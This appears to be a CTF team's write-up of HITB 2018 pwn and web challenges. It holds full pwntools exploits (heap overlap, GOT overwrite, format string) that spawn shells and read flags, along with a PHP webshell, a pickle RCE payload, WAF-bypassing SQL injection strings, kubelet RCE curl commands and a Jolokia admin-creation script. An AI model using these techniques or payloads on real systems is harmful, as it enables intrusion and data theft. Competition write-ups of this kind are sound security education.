#!/usr/bin/env python2</li>
</ul>
<p>from pwn import *
from IPython import embed
import re</p>
<p>context.arch = &#39;amd64&#39;</p>
<p>r = remote(&#39;47.75.154.113&#39;, 9999)</p>
<p>def new_msg(idx, content):
    r.sendlineafter(&#39;Which? :&#39;, &#39;1&#39;)
    r.sendlineafter(&#39;Which? :&#39;, str(idx))
    r.sendlineafter(&#39;msg:&#39;, content)</p>
<p>def edit_msg(idx, content, pwn=0):
    r.sendlineafter(&#39;Which? :&#39;, &#39;2&#39;)
    r.sendlineafter(&#39;Which? :&#39;, str(idx))
    if pwn:
        r.sendafter(&#39;msg:&#39;, content)
    else:
        r.sendlineafter(&#39;msg:&#39;, content)</p>
<p>def del_msg(idx):
    r.sendlineafter(&#39;Which? :&#39;, &#39;3&#39;)
    r.sendlineafter(&#39;Which? :&#39;, str(idx))</p>
<p>def b64e(c):
    return c.encode(&#39;base64&#39;).replace(&#39;\n&#39;, &#39;&#39;)</p>
<p>def exp_new_msg(idx, content):
    b64 = b64e(content)
    if b64[-2] == &#39;=&#39;:
        new_msg(idx, b64[:-2])
    elif b64[-1] == &#39;=&#39;:
        new_msg(idx, b64[:-1])
    else:
        new_msg(idx, b64)</p>
<h1 id="40-&-41-are-the-magic-numbers-:)"><a class="header-link" href="#40-&-41-are-the-magic-numbers-:)"></a>40 &amp; 41 are the magic numbers :)</h1>
<p>exp_new_msg(0, &#39;a&#39;<em>40)
new_msg(1, b64e(&#39;a&#39;</em>0x203))
new_msg(2, b64e(&#39;a&#39;<em>0x100))
edit_msg(1, flat(
    [0xdeadbeef]</em>28,
    0xf0, 0x20,
    0, 0,
    [0xaabbccdd]*30,
    0x200, 0x120,
))</p>
<h1 id="overflow-1's-size-(unsorted-bin)"><a class="header-link" href="#overflow-1's-size-(unsorted-bin)"></a>overflow 1&#39;s size (unsorted bin)</h1>
<p>del_msg(1)
edit_msg(0, &#39;a&#39;*40)</p>
<p>new_msg(3, b64e(&#39;b&#39;<em>0x100))
new_msg(4, b64e(&#39;c&#39;</em>0x60))
del_msg(3)
del_msg(2)</p>
<h1 id="for-fastbin-attack"><a class="header-link" href="#for-fastbin-attack"></a>for fastbin attack</h1>
<p>del_msg(4)</p>
<h1 id="overlapped-chunks,-overwrite-fastbin->fd"><a class="header-link" href="#overlapped-chunks,-overwrite-fastbin->fd"></a>overlapped chunks, overwrite fastbin-&gt;fd</h1>
<p>new_msg(5, b64e(&#39;d&#39;<em>0x200))
fast_bin_addr = 0x60216d
edit_msg(5, flat(
    [0]</em>32,
    0, 0x71,
    fast_bin_addr,
))</p>
<p>new_msg(6, b64e(&#39;a&#39;*0x60))</p>
<h1 id="on-bss"><a class="header-link" href="#on-bss"></a>on bss</h1>
<p>new_msg(60, b64e(&#39;A&#39;*0x60))
free_got = 0x602018
strlen_got = 0x602028
atoi_got = 0x602068
puts_plt = 0x400770
alarm_plt = 0x4007b0
edit_msg(60, &#39;BBB&#39;+flat(free_got, atoi_got, atoi_got, strlen_got))</p>
<h1 id="free-->-puts"><a class="header-link" href="#free-->-puts"></a>free -&gt; puts</h1>
<p>edit_msg(0, flat(puts_plt))</p>
<h1 id="free(1)-==-puts(atoi_got)"><a class="header-link" href="#free(1)-==-puts(atoi_got)"></a>free(1) == puts(atoi_got)</h1>
<p>del_msg(1)
x = r.recvuntil(&#39;1. read&#39;)
xx = x[8:14].ljust(8, &#39;\x00&#39;)
libc = u64(xx)-0x36e80
system = libc + 0x45390
print &#39;libc:&#39;, hex(libc)</p>
<h1 id="strlen-->-alarm-to-bypass-read_n-len-restriction"><a class="header-link" href="#strlen-->-alarm-to-bypass-read_n-len-restriction"></a>strlen -&gt; alarm to bypass read_n len restriction</h1>
<p>edit_msg(3, flat(alarm_plt))</p>
<h1 id="atoi-->-system"><a class="header-link" href="#atoi-->-system"></a>atoi -&gt; system</h1>
<p>edit_msg(2, flat(system)[:-1])
r.sendline(&#39;/bin/sh&#39;)</p>
<p>r.interactive()</p>
<h1 id="hitb{b4se364_1s_th3_b3st_3nc0d1ng!}"><a class="header-link" href="#hitb{b4se364_1s_th3_b3st_3nc0d1ng!}"></a>HITB{b4se364_1s_th3_b3st_3nc0d1ng!}</h1>
<pre class="hljs"><code>
### babypwn (how2hack)

#### Vulnerability
A challenge <span class="hljs-keyword">with</span> format string vulnerability without given binary.

#### Solution
My first intuition is to find the `.got.plt` section and overwrite something into `<span class="hljs-keyword">system</span>`. As the binary has no PIE enabled (can find out by leaking some address out and you will notice there are a lot <span class="hljs-keyword">of</span> address start <span class="hljs-keyword">with</span> `<span class="hljs-number">0x40</span>XXXX` or `<span class="hljs-number">0x60</span>XXXX`), we can guess the `.got.plt` section is around `<span class="hljs-number">0x601000</span>`.
</code></pre><p>0x601000 0x202020600e20
0x601008 0x7fb6b4617168
0x601010 0x7fb6b4407870
0x601018 0x7fb6b409c6b0
0x601020 0x102020202020 # ????
0x601028 0x7fb6b4094d80
0x601030 0x7fb6b4123d60</p>
<pre class="hljs"><code>I was unable <span class="hljs-keyword">to</span> leak `<span class="hljs-number">0x601020</span>` <span class="hljs-keyword">for</span> <span class="hljs-keyword">some</span> reason.
I <span class="hljs-keyword">try</span> <span class="hljs-keyword">to</span> leak <span class="hljs-keyword">the</span> called functions <span class="hljs-keyword">as</span> well.</code></pre><p>0x4003c5 gets    ?@
0x4003ca stdin    ?@
0x4003d0 printf    ?@
0x4003d7 stdout    ?@
0x4003de stderr    ?@
0x4003e5 usleep    ?@
0x4003ea setbuf    ?@
0x4003f1 __libc_start_main    ?@</p>
<pre class="hljs"><code>Then I have <span class="hljs-built_in">to</span> leak <span class="hljs-keyword">the</span> libc <span class="hljs-built_in">version</span>, but I am too lazy <span class="hljs-built_in">to</span> <span class="hljs-built_in">do</span> <span class="hljs-keyword">it</span> so I <span class="hljs-keyword">try</span> <span class="hljs-built_in">to</span> find my <span class="hljs-built_in">local</span> libc <span class="hljs-keyword">and</span> check <span class="hljs-keyword">for</span> <span class="hljs-keyword">the</span> <span class="hljs-built_in">offset</span>.</code></pre><p>gets: 0x6ed80    (0x601028)
printf: 0x55800  (0x601020)?
usleep: 0xfdd60  (0x601030)</p>
<pre class="hljs"><code>Now I understand why `<span class="hljs-number">0x601020</span>` was unable <span class="hljs-built_in">to</span> leak because <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> <span class="hljs-literal">null</span> <span class="hljs-keyword">byte</span> <span class="hljs-keyword">of</span> its <span class="hljs-built_in">offset</span>. I confirmed this <span class="hljs-keyword">by</span> checking `<span class="hljs-number">0x601021</span>` <span class="hljs-keyword">and</span> I got this:</code></pre><p>0x601021 0x7f3e9ac0d8 (end with &#39;8&#39;, so the offset should be &#39;800&#39;)</p>
<pre class="hljs"><code>Finally, overwrite `<span class="hljs-built_in">printf</span>` <span class="hljs-keyword">to</span> `<span class="hljs-built_in">system</span>` then we <span class="hljs-built_in">get</span> the <span class="hljs-keyword">shell</span>.

#### Exploit
```<span class="hljs-keyword">python</span>
#!/usr/bin/env <span class="hljs-keyword">python</span>

from pwn import *

host = <span class="hljs-string">'47.75.182.113'</span>
port = <span class="hljs-number">9999</span>

r = remote(host, port)

def fmt(<span class="hljs-keyword">prev</span>, word, <span class="hljs-built_in">index</span>):
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">prev</span> &lt; word:
        result = word - <span class="hljs-keyword">prev</span>
        fmtstr = <span class="hljs-string">'%'</span> + str(result) + <span class="hljs-string">'c'</span>
    elif <span class="hljs-keyword">prev</span> == word:
        result = <span class="hljs-number">0</span>
    <span class="hljs-keyword">else</span>:
        result = <span class="hljs-number">256</span> - <span class="hljs-keyword">prev</span> + word
        fmtstr = <span class="hljs-string">'%'</span> + str(result) + <span class="hljs-string">'c'</span>
    fmtstr += <span class="hljs-string">'%'</span> + str(<span class="hljs-built_in">index</span>) + <span class="hljs-string">'$hhn'</span>
    <span class="hljs-keyword">return</span> fmtstr

<span class="hljs-keyword">sleep</span>(<span class="hljs-number">5</span>)

system_off = <span class="hljs-number">0</span>x45390
printf_plt = <span class="hljs-number">0</span>x601020
gets_plt = <span class="hljs-number">0</span>x601028
gets_off = <span class="hljs-number">0</span>x6ed80

payload = <span class="hljs-string">'%7$s    '</span> + p64(gets_plt)
r.sendline(payload)
gets = u64(r.recv(<span class="hljs-number">1000</span>, timeout=<span class="hljs-number">1</span>)[:<span class="hljs-number">6</span>].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">'\x00'</span>))
<span class="hljs-keyword">print</span> <span class="hljs-string">'gets:'</span>, hex(gets)

libc = gets - gets_off
<span class="hljs-keyword">print</span> <span class="hljs-string">'libc:'</span>, hex(libc)

<span class="hljs-built_in">system</span> = libc + system_off
<span class="hljs-keyword">print</span> <span class="hljs-string">'system:'</span>, hex(<span class="hljs-built_in">system</span>)

payload = <span class="hljs-string">''</span>
<span class="hljs-keyword">prev</span> = <span class="hljs-number">0</span>
<span class="hljs-keyword">for</span> i in <span class="hljs-built_in">range</span>(<span class="hljs-number">3</span>):
    payload += fmt(<span class="hljs-keyword">prev</span>, (<span class="hljs-built_in">system</span> &gt;&gt; <span class="hljs-number">8</span> * i) &amp; <span class="hljs-number">0</span>xff, <span class="hljs-number">11</span> + i)
    <span class="hljs-keyword">prev</span> = (<span class="hljs-built_in">system</span> &gt;&gt; <span class="hljs-number">8</span> * i) &amp; <span class="hljs-number">0</span>xff

payload += <span class="hljs-string">'A'</span>*(<span class="hljs-number">8</span> - (<span class="hljs-built_in">len</span>(payload) % <span class="hljs-number">8</span>))
payload += p64(printf_plt) + p64(printf_plt+<span class="hljs-number">1</span>) + p64(printf_plt+<span class="hljs-number">2</span>)

r.sendline(payload)

r.recv(<span class="hljs-number">1000</span>)
<span class="hljs-keyword">sleep</span>(<span class="hljs-number">1</span>)

r.sendline(<span class="hljs-string">'/bin/sh'</span>)
r.sendline(<span class="hljs-string">'cat flag'</span>)
flag = r.recvline()

<span class="hljs-built_in">log</span>.success(<span class="hljs-string">'FLAG: '</span> + flag)</code></pre><pre class="hljs"><code>[+] Opening connection to <span class="hljs-number">47.75</span><span class="hljs-meta">.182</span><span class="hljs-meta">.113</span> on port <span class="hljs-number">9999</span>: Done
<span class="hljs-symbol">gets:</span> <span class="hljs-number">0x7f99aca0dd80</span>
<span class="hljs-symbol">libc:</span> <span class="hljs-number">0x7f99ac99f000</span>
<span class="hljs-symbol">system:</span> <span class="hljs-number">0x7f99ac9e4390</span>
[+] FLAG: HITB{Baby_Pwn_BabY_bl1nd}
[*] Closed connection to <span class="hljs-number">47.75</span><span class="hljs-meta">.182</span><span class="hljs-meta">.113</span> port <span class="hljs-number">9999</span></code></pre><h2 id="web"><a class="header-link" href="#web"></a>web</h2>
<h3 id="upload-(bookgin)"><a class="header-link" href="#upload-(bookgin)"></a>Upload (bookgin)</h3>
<h4 id="find-the-target"><a class="header-link" href="#find-the-target"></a>Find the target</h4>
<p>First, we can upload some images to the server. With some manual tests, we found we can upload <code>.PHP</code> to the server, since <code>.php</code> is WAFed. Addiotionally, we notice that the server OS is running Microsoft IIS, so the filesystem is case-insensitive. </p>
<p>Next, we have to dig how to access our webshell. We have no idea the directory name of the uploaded files. </p>
<p>Therefore, the objective is very clear: retrieve the path name of the directory.</p>
<p>It&#39;s Windows+PHP, so let&#39;s give this a try. Refer to <a href="http://www.madchat.fr/coding/php/secu/onsec.whitepaper-02.eng.pdf">onsec whiltepaper - 02</a> page 5. I even write a post about this feature in <a href="https://bookgin.github.io/2016/09/07/PHP-File-Access-in-Windows/">my blog</a> (in Chinese).</p>
<h4 id="brute-force-the-path-and-rce"><a class="header-link" href="#brute-force-the-path-and-rce"></a>Brute force the path and RCE</h4>
<p>Here is the brute script:</p>
<pre class="hljs"><code><span class="hljs-comment">#!/usr/bin/env python3</span>
<span class="hljs-comment"># Python 3.6.4</span>
<span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> string
sess = requests.session()

name = <span class="hljs-string">''</span>
<span class="hljs-keyword">while</span> <span class="hljs-keyword">True</span>:
    print(name)
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> string.digits + string.ascii_letters:
        guess = name + str(i)
        <span class="hljs-keyword">if</span> <span class="hljs-string">'image error'</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> sess.get(<span class="hljs-string">'http://47.90.97.18:9999/pic.php?filename=../'</span> + guess + <span class="hljs-string">'%3C/1523462240.jpg'</span>).text:
            name += str(i)
            <span class="hljs-keyword">break</span></code></pre><p>We have RCE now. Next, we found the flag is in <code>../flag.php</code>, but some php useful function is disabled. A quick bypass is <code>highlight_file</code>. Here is the web shell:</p>
<pre class="hljs"><code><span class="hljs-meta">&lt;?php</span>
error_reporting(E_ALL);

<span class="hljs-keyword">foreach</span> (glob(<span class="hljs-string">"../flag.php"</span>) <span class="hljs-keyword">as</span> $filename) {
    <span class="hljs-keyword">echo</span> <span class="hljs-string">"$filename size "</span> . filesize($filename) . <span class="hljs-string">"\n"</span>;
    highlight_file($filename);
}</code></pre><p>The flag is <code>HITB{e5f476c1e4c6dc66278db95f0b5a228a}</code>.</p>
<h3 id="python's-revenge-(sasdf)"><a class="header-link" href="#python's-revenge-(sasdf)"></a>Python&#39;s revenge (sasdf)</h3>
<p>Bruteforce 4 bytes cookie secret offline which is <code>hitb</code>. Once we have cookie secret, we can construct malicious pickle that trigger RCE in serverside by pickle&#39;s <code>reduce</code> instruction. It has a large blacklist for filtering functions which are used to reduce, such as <code>os.system</code>. But it doesn&#39;t reject to import them onto pickle stack. Call <code>__builtin__.map(os.system, [code])</code> to bypass blacklist.</p>
<h4 id="payload"><a class="header-link" href="#payload"></a>Payload</h4>
<p>Replace <code>&#39;echo 1337&#39;</code> with repr of reverse shell payload that can be easily found on Internet. Use echo here for increasing readability.</p>
<pre class="hljs"><code><span class="hljs-string">"c__builtin__\nrepr\np\nc__builtin__\nmap\np\n(cos\nsystem\n(lp0\nS'echo 1337'\np1\natp\nRp\nRp\n."</span></code></pre><h3 id="php-lover-(bookgin-&-sces60107)"><a class="header-link" href="#php-lover-(bookgin-&-sces60107)"></a>PHP lover (bookgin &amp; sces60107)</h3>
<h4 id="possible-sql-injection"><a class="header-link" href="#possible-sql-injection"></a>Possible SQL injection</h4>
<p>In the PHP source files, the report is very suspicious. The only way to create a report is to trigger an error here:</p>
<pre class="hljs"><code><span class="hljs-keyword">if</span>(file_exists($avatar) <span class="hljs-keyword">and</span> filesize($avatar)&lt;<span class="hljs-number">65535</span>){
    $data=file_get_contents($avatar);
    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;user-&gt;updateavatar($data)) quit(<span class="hljs-string">'Something error!'</span>);
} 
<span class="hljs-keyword">else</span>{
    <span class="hljs-comment">//TODO！report it！</span>
    $out=<span class="hljs-string">"Your avatar is invalid, so we reported it"</span>.<span class="hljs-string">"&lt;/p&gt;"</span>;
    $report=<span class="hljs-keyword">$this</span>-&gt;user-&gt;getreport();
    <span class="hljs-keyword">if</span>($report){
        $out.=<span class="hljs-string">"Your last report used email "</span>.htmlspecialchars($report[<span class="hljs-number">2</span>],ENT_QUOTES).<span class="hljs-string">", and report type is "</span>.$report[<span class="hljs-number">3</span>];
    } 
    <span class="hljs-keyword">include</span>(<span class="hljs-string">"templates/error.html"</span>);
    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;user-&gt;report(<span class="hljs-number">1</span>)) quit(<span class="hljs-string">'Something error!'</span>);
    <span class="hljs-keyword">die</span>();
} </code></pre><p>Also, when insering a new report, it seems vulnerable to SQL injection. Unlike other edting features in the website, the email address here is not properly escaped through <code>addslashes()</code>. </p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">report</span><span class="hljs-params">($type_id)</span></span>{                                                                                                           
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;db-&gt;Insert(<span class="hljs-string">"reports"</span>,<span class="hljs-keyword">array</span>(<span class="hljs-keyword">$this</span>-&gt;id,<span class="hljs-string">"'$this-&gt;email'"</span>,$type_id));
} </code></pre><p>But how to trigger this error in order to create a new report? We have to make the test failed <code>file_exists($avatar)</code>. The <code>$avatar</code> is the filepath of our avatar, and the fiepath is <code>upload/[USERNAME].png</code>. In order to make the file somehow &quot;disappeared&quot;, we can make avatar.filepath length limit <code>varchar(300)</code> in the SQL schema very long, because in the source code:</p>
<pre class="hljs"><code>$filename=<span class="hljs-string">"uploads/"</span>.<span class="hljs-keyword">$this</span>-&gt;user-&gt;getuser().<span class="hljs-string">"."</span>.$type;
<span class="hljs-keyword">if</span>(is_uploaded_file($_FILES[<span class="hljs-string">'avatar'</span>][<span class="hljs-string">'tmp_name'</span>])){
    <span class="hljs-keyword">$this</span>-&gt;user-&gt;edit(<span class="hljs-string">"avatar"</span>,<span class="hljs-keyword">array</span>($filename,$type));</code></pre><p>Simply register a user with username length 300, and the avatar.filepath will be truncated.</p>
<p>Next, in order to exploit SQL injection, we have to bypass the email format regex check and another filter.</p>
<h4 id="bypass-wafs"><a class="header-link" href="#bypass-wafs"></a>Bypass WAFs</h4>
<h5 id="email-format-regex-check"><a class="header-link" href="#email-format-regex-check"></a>Email format regex check</h5>
<pre class="hljs"><code><span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">'/^(([^&lt;&gt;()[\]\\.,;:\s@\"]+(\.[^&lt;&gt;()[\]\\.,;:\s@\"]+)*)|([\"].+[\"]))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/i'</span>,$value)) <span class="hljs-keyword">return</span> <span class="hljs-keyword">false</span>;</code></pre><p>Taking a closer look, we found it can be bypassed using double quotes. This is a valid email address <code>&quot;&#39;, 17385)#&#39;&quot;@a.aa</code>.</p>
<h5 id="hacker-filter"><a class="header-link" href="#hacker-filter"></a>Hacker Filter</h5>
<pre class="hljs"><code>$preg=<span class="hljs-string">"\\b(benchmark\\s*?\\(.*\\)|sleep\\s*?\\(.*\\)|load_file\\s*?\\()|UNION.+?SELECT\\s*(\\(.+\\)\\s*|@{1,2}.+?\\s*|\\s+?.+?|(`|\'|\").*?(`|\'|\")\\s*)|UPDATE\\s*(\\(.+\\)\\s*|@{1,2}.+?\\s*|\\s+?.+?|(`|\'|\").*?(`|\'|\")\\s*)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\\(.+\\)|\\s+?.+?\\s+?|(`|\'|\").*?(`|\'|\"))FROM(\{.+\}|\\(.+\\)|\\s+?.+?|(`|\'|\").*?(`|\'|\"))|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"</span>;
<span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">"/"</span>.$preg.<span class="hljs-string">"/is"</span>,$string)){
    <span class="hljs-keyword">die</span>(<span class="hljs-string">'hacker'</span>);
} </code></pre><p>This regex almost filters all the useful keywords in SQL. However, we note that the first character <code>b</code> in the regex, which means <a href="http://php.net/manual/en/function.preg-match.php#105924">word match</a>. Thus, we can just append a MySQL comment <code>/**/</code> to bypass the filter!</p>
<h4 id="get-the-flag"><a class="header-link" href="#get-the-flag"></a>Get the flag</h4>
<p>The payload will be like this. In order to creat a valid SQL query, the <code>#</code> is required to comment out the trailing <a href="mailto:`@a.aa">`@a.aa</a>` in the email address.</p>
<pre class="hljs"><code>"', 12), (10272, (<span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span><span class="hljs-comment">/**/</span> <span class="hljs-keyword">users</span>), <span class="hljs-number">9487</span>)#<span class="hljs-string">"@a.aa</span></code></pre><p>So the raw SQL query in the server side becomes:</p>
<pre class="hljs"><code>insert into reports (`...`, `...`) values 
(<span class="hljs-number">9453</span> , <span class="hljs-string">'"'</span>, <span class="hljs-number">12</span>), 
(<span class="hljs-number">10272</span>, (SQLi PAYLOAD), <span class="hljs-number">9487</span>)#<span class="hljs-string">"@a.aa' , 1 )</span></code></pre><p>After retriving the table and column name using group_concat and information_schema, we are able to get the flag.</p>
<p>Final payload: <code>&quot;&#39;, 9453), (10272, (SELECT GROUP_CONCAT(fllllag_is_hhhhere) FROM/**/ fffflag_is_here), 9487)#&quot;@a.aa</code></p>
<p>The flag is <code>HITB{2e9ular131mp0rt4nt}</code>.</p>
<p>Refer to <a href="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">SQL injection cheatsheet by pentestmonkey</a></p>
<h3 id="baby-baby-(bookgin)"><a class="header-link" href="#baby-baby-(bookgin)"></a>baby baby (bookgin)</h3>
<h4 id="recon"><a class="header-link" href="#recon"></a>Recon</h4>
<p>The NMAP scanning result shows 3 ports are opened:</p>
<ul class="list">
<li>80: HTTP + nginx</li>
<li>9999: HTTP + nginx</li>
<li>10250: HTTPS + unkownn backend</li>
</ul>
<p>First, the 80 port webserver is running PHP as backend. For the port 9999, it returns 403 forbidden when accessing the root. How about trying to access <code>index.php</code> ? To our surprise we got this:</p>
<pre class="hljs"><code>This is a pentest challenge, open your mind!                                                                                             
&lt;img style=<span class="hljs-string">"width: 300px;"</span> src=<span class="hljs-string">"jd.png"</span> alt=<span class="hljs-string">"the picture is unrelated to this challenge, just a advertisement"</span> /&gt;

<span class="hljs-meta">&lt;?php</span>
    <span class="hljs-keyword">eval</span>($__POST[<span class="hljs-string">"backdoor"</span>]);
<span class="hljs-meta">?&gt;</span></code></pre><p>Note that ther are 2 underscores. After wasting 2 hours on finding a way to exploit this backdoor, we think this direction is incorrect. It&#39;s just a troll.</p>
<p>So how about the 10250 port? We use Dirbuster to brute force the filepath at a very low rate (2 request per second), to not affect other teams. Quickly it finds 2 intersting pages:</p>
<ul class="list">
<li><a href="https://47.75.146.42:10250/metrics">https://47.75.146.42:10250/metrics</a></li>
<li><a href="https://47.75.146.42:10250/stats">https://47.75.146.42:10250/stats</a> </li>
</ul>
<p>After Googling, this is related to kubelet API. Acctually, we can just Google the port number and found it. However we fotgot to do that...... It&#39;s really dumb to do directory name brute force.</p>
<p>Another quick Google, we found the kubelet API is vulnerable to RCE. Refer to <a href="https://github.com/bgeesaman/hhkbe">https://github.com/bgeesaman/hhkbe</a>, page P.35.</p>
<h4 id="rce"><a class="header-link" href="#rce"></a>RCE</h4>
<ul class="list">
<li>Get the info of running pods: <code>curl -sk https://47.75.146.42:10250/runningpods/</code></li>
<li>RCE: <code>curl -sk https://47.75.146.42:10250/run/esn-system/web-test-4092782360-035qx/web-test -d &#39;cmd=cat /flag.txt&#39;</code></li>
</ul>
<p>The flag is <code>HITB{KKKKKKKKKKKKKKKKKKKKKKKKK}</code>. (The acronym of kubernetes is k8s) </p>
<h3 id="baby-nya-(bookgin)"><a class="header-link" href="#baby-nya-(bookgin)"></a>baby nya (bookgin)</h3>
<p>The hint: <code>the tomcat deployed jolokia.war</code></p>
<h4 id="exposed-jserv-protocol"><a class="header-link" href="#exposed-jserv-protocol"></a>Exposed Jserv protocol</h4>
<p>2 ports are open:</p>
<ul class="list">
<li>8009: ajp13 Apache Jserv</li>
<li>9999: nginx HTTP</li>
</ul>
<p>The 9999 port will only return <code>&lt;h1&gt;debug port for admin, you can just ignore the port.&lt;/h1&gt;</code>. We trust him so we didn&#39;t dig it deeper.</p>
<p>For the 8089 port, it exposes the Jserv protocol, we can set up a apache as a local proxy server to coonect tot the remote webserver. Refer to <a href="https://highon.coffee/blog/sleepy-ctf-walkthrough/#apache-tomcat-jserv-proxy-setup">https://highon.coffee/blog/sleepy-ctf-walkthrough/#apache-tomcat-jserv-proxy-setup</a> .</p>
<p>A quick dive into the webserver, we found the jolokia API can be used. For the document, refer to <a href="https://jolokia.org/reference/html/protocol.html">https://jolokia.org/reference/html/protocol.html</a> .</p>
<h4 id="exploit-the-jolokia"><a class="header-link" href="#exploit-the-jolokia"></a>Exploit the jolokia</h4>
<p>Refer to <a href="https://paper.seebug.org/552/">https://paper.seebug.org/552/</a></p>
<ul class="list">
<li>List APIs : <code>/jolokia/list</code></li>
<li>CreateAdmin Account and login: POST 3 jsons requests, Here is the script. You can use curl to send json request as well.
<code>`</code>
#!/usr/bin/env python3<h1 id="python-3.6.4"><a class="header-link" href="#python-3.6.4"></a>Python 3.6.4</h1>
import requests
import json
sess = requests.session()</li>
</ul>
<p>payload = {
        &#39;type&#39;:&#39;EXEC&#39;,
        &quot;mbean&quot;: &quot;Users:database=UserDatabase,type=User,username=\&quot;taiwannoooo1\&quot;&quot;,</p>
<pre class="hljs"><code>    <span class="hljs-meta">#<span class="hljs-string">'mbean'</span>:<span class="hljs-string">'Users:database=UserDatabase,type=UserDatabase'</span>,</span>
    <span class="hljs-string">'operation'</span>:<span class="hljs-string">'addRole'</span>,
    <span class="hljs-meta">#<span class="hljs-string">'arguments'</span>:[<span class="hljs-string">'manager-gui'</span>],</span>
    <span class="hljs-string">'arguments'</span>:[<span class="hljs-string">'taiwannoooo1'</span>, <span class="hljs-string">'TAIWAN'</span>, <span class="hljs-string">'i_love_taiwan'</span>],</code></pre><p>}</p>
<p>response = sess.post(&#39;<a href="http://MY_SERVER_IP/jolokia&#39;">http://MY_SERVER_IP/jolokia&#39;</a>, json=payload)</p>
<p>response_json = json.loads(response.text)
response_json = json.dumps(response_json, indent=2, sort_keys=True)
print(response_json)
print(response.status_code)</p>
<pre class="hljs"><code>- Login to admin <span class="hljs-keyword">interface</span>: `/manager/`

The flag <span class="hljs-keyword">is</span> displayed <span class="hljs-keyword">in</span> the manager interace. `HITB{TOMCAT_TOMCAT_KAWAII}`

### baby fs (unsolved, written by bookgin, thanks to the organizer QQ group)

**This writeup <span class="hljs-keyword">is</span> from organizer QQ group (<span class="hljs-keyword">not</span> IRC).**

- The parameters: ip, permission, squash, path
- Problem name: baby fs
- HTML title: CFS

<span class="hljs-keyword">With</span> the knowledge above, one should know it<span class="hljs-symbol">'s</span> a NFS server. The page seems to update `/etc/exports` per key.

<span class="hljs-keyword">Then</span>, the ip parameter can accpeted ip <span class="hljs-keyword">range</span> `<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>`, <span class="hljs-keyword">and</span> it seems vulnerable to CRLF injection. 

The payload <span class="hljs-keyword">is</span>  `http://<span class="hljs-number">47.75</span>.<span class="hljs-number">35.123</span>:<span class="hljs-number">9999</span>/?action=create&amp;key=<span class="hljs-number">8</span>ce29e523ed35f49c7eb38b63c91f269&amp;ip=<span class="hljs-number">140.112</span>.<span class="hljs-number">0.0</span>%<span class="hljs-number">0</span>A/%<span class="hljs-number">20</span>*&amp;permission=rw&amp;squash=no_root_squash`.

<span class="hljs-keyword">Then</span>, listing the root directory through `http://<span class="hljs-number">47.75</span>.<span class="hljs-number">35.123</span>:<span class="hljs-number">9999</span>/?action=list&amp;key=<span class="hljs-number">8</span>ce29e523ed35f49c7eb38b63c91f269&amp;path=/` shows the flag.

The flag <span class="hljs-keyword">is</span> `HITB{<span class="hljs-comment">----&gt;}!}&lt;0&gt;cccc}`.</span>


I think this challenge requires <span class="hljs-keyword">some</span> guessing. Until the competition ends, icchy (Tokyo westerns) <span class="hljs-keyword">is</span> the only one who solves this challenge. Additionally, they solve it very quickly after the challenge releases. Congraz to them. They definitely have brorder knowledge!

Update: According to Tokey Westerns' writeup, this problem seems to provide an output <span class="hljs-keyword">with</span> more details <span class="hljs-keyword">when</span> the organizer first releases the challenge, `/data/k989ug3pzj <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>(rw,all_squash)`. However, the organizer seems to update this challenge during the competition. The output becomes `/data/k989ug3pzj`, which <span class="hljs-keyword">is</span> less informational. I think the hint <span class="hljs-keyword">in</span> the problem `bug fixed <span class="hljs-keyword">of</span> baby fs on creating directory` explains this. They acctually <span class="hljs-string">"fixed"</span> a hint. I don<span class="hljs-symbol">'t</span> think it<span class="hljs-symbol">'s</span> fair.

### <span class="hljs-number">3</span>pigs (unsolved, written by how2hack)
#### Hint
&gt;<span class="hljs-number">1</span>) this <span class="hljs-keyword">is</span> web pwn
&gt;<span class="hljs-number">2</span>) Go, I put everything there<span class="hljs-comment">-----github</span>
&gt;<span class="hljs-number">3</span>) you can make the size <span class="hljs-keyword">of</span> topchunk very small
&gt;<span class="hljs-number">4</span>) https://github.com/thr33pigs/<span class="hljs-number">3</span>pigs/tree/master/ctf
&gt;<span class="hljs-number">5</span>) fix the flag

#### Web Challenge? WutFace
You can get the source code from the given Github link.
The webserver using Flask(Python) as backend <span class="hljs-keyword">and</span> connect to another server (which <span class="hljs-keyword">is</span> the <span class="hljs-number">3</span>pigs binary).
The vulnerabilities basically <span class="hljs-keyword">not</span> related to web so I think the first hint make sense. &gt;_&gt;
User uses this website to make actions <span class="hljs-keyword">and</span> the webserver will communicate <span class="hljs-keyword">with</span> the binary server <span class="hljs-keyword">and</span> <span class="hljs-keyword">return</span> the given responses to the user.

#### First stage (Misc)
Before checking the binary, I noticed that there <span class="hljs-keyword">is</span> a kind <span class="hljs-keyword">of</span> <span class="hljs-string">"flying pig"</span> that needs a special `secret` code to be able to make it online.
```python
@shop.route('/flypig.php', methods=[<span class="hljs-symbol">'POST</span>'])
def flypig():
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> isadmin(session):
        <span class="hljs-keyword">return</span> alert(<span class="hljs-string">"Not Login!"</span>)
    try:
        secret = request.form.get(<span class="hljs-symbol">'secret</span>',None)
        secret = secret.decode(<span class="hljs-string">"base64"</span>)[:<span class="hljs-number">0</span>xc0]
        useflypig = getb(session).getpigs()[-<span class="hljs-number">1</span>].status
